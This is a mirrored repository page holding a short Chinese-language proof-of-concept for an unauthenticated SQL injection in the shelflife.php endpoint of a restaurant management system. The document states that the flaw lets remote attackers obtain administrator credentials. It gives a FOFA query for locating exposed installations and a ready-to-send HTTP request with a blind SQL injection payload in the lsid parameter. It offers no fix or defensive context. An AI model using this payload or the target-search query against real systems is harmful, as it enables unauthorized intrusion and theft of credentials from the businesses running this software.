admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
wy876_POC/喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞.md

21 lines
710 B
Markdown
Raw Normal View History

8.13更新漏洞
2024-08-13 12:44:01 +08:00
## 喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞
喰星云·数字化餐饮服务系统 shelflife.php 接口处存在SQL注入漏洞未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码登录凭证信息导致后台权限被控造成信息泄露使系统处于极不安全的状态。
## fofa
```yaml
body="tmp_md5_pwd"
```
## poc
```java
GET /logistics/home_warning/php/shelflife.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6191=6193)+THEN+%27%27+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
```
Reference in New Issue Copy Permalink